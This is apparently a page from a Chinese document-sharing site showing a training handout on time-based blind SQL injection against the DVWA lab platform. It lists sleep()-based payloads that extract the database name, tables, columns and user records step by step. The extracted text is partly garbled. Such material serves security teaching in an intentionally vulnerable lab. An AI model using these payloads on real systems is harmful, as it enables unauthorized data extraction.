数据库应用与安全管理实训SQL注入(时间盲注)1_第1页
数据库应用与安全管理实训SQL注入(时间盲注)1_第2页
数据库应用与安全管理实训SQL注入(时间盲注)1_第3页
数据库应用与安全管理实训SQL注入(时间盲注)1_第4页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、言1言息宜至与管理专皿兼学资腼库实训I SQL注入(时间盲注)1一、实训目的1 . 了解SQL注入的常用方式2 .掌握SQL时间盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1 .配置DVWA平台进入DVWA平台,选择DVWA Security ,将安全级别设置为Low。2 .测试SQL注入点(1)点击SQL Injection (Blind),进入测试页面。(2)使用参数1' and sleep(5) # 进行提交,页面明显延迟。使用参数1 andsleep(5) #进行提交,页面没有延迟。说明是基于字符的时间盲注。(3)猜解数据库名的长

2、度。具体命令如下:/明显延迟? 1' and if(length(database()=1,sleep(5),1) #/ 没有延迟1' and if(length(database()=4,sleep(5),1) #(4)二分法猜解数据库名。具体命令如下:八言息我至与管理专皿裁学费腼每? 1' andif(ascii(substr(database(),1,1)>97,sleep(5),1)#/明显延迟? 1' andif(ascii(substr(database(),1,1)<100,sleep(5),1)#/没有延迟? 1' andif

3、(ascii(substr(database(),1,1)>100,sleep(5),1)#/没有延迟修改substr函数的第二个参数,如substr(database(),2,1) 进行测试,可以 获得数据库的第二个字母。(5)猜解数据库表的数量。具体命令如下:? 1' and if(select count(table_name)frominformation_schema.tableswheretable_schema=database() )=1,sleep(5),1)#/ 没有延迟? 1' and if(select count(table_name)fromi

4、nformation_schema.tableswheretable_schema=database() )=2,sleep(5),1)#/ 明显延迟(6)猜解数据库表名的长度。具体命令格式如下:/没有延迟? 1' and if(length(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=1,sleep(5),1) #言1言息宜至与管理专皿兼学资腼库1' and if(length(substr(selecttablename

5、frominformation_schema.tables where table_schema=database()limit 0,1),1)=9,sleep(5),1) #/ 明显延迟table_name from(7)猜解数据库表的名称。具体命令格式如下:1' and if(ascii(substr(selectinformation_schema.tables where table_schema=database() limit 0,1),1,1)>103,sleep(5),1) #/ 没有延迟? 1' and if(ascii(substr(select ta

6、ble_name from information_schema.tables where table_schema=database() limit 0,1),1,1)<103,sleep(5),1) #/ 没有延迟重复上述步骤,猜解出两个表名。(8)猜解数据库表中的字段长度。具体命令格式如下:? 1' and if(select count(column_name) frominformation_schema.columnswhere table_name='users')=1,sleep(5),1)#/ 没有延迟1' and if(selectco

7、unt(column_name)frominformation_schema.columnswhere table_name='users')=8,sleep(5),1)#/ 明显延迟(9)猜解数据库表中的字段名称。具体命令格式如下:言1言息宜至与管理专皿兼学资腼库1' and if(ascii(substr(selectcolumnnamefrominformation_schema.columns where table_name= 'users' limit 0,1),1,1)>117,sleep(5),1) #/ 没有延迟1' an

8、d if(ascii(substr(select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1)<117,sleep(5),1) #/ 没有延迟(10)猜解表中的数据。具体命令格式如下:1' and if(select count(first_name) from users)=5,sleep(5),1) # /明显延迟users表中的字段数为5猜测每条记录的长度。说明巾rst_name的第一个值得长度为5个字符。? 1' and if(length(substr(select first_name from users limit 0,1),1)=5,sleep(5),1) #/ 明显延迟(11)二分法猜解表中的数据。具体命令格式如下:?1'andif(ascii(substr(selectfirst_namefromuserslimit0,1),1,1)&g

人人文库> 全部分类> 应用文书 > 作业报告

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论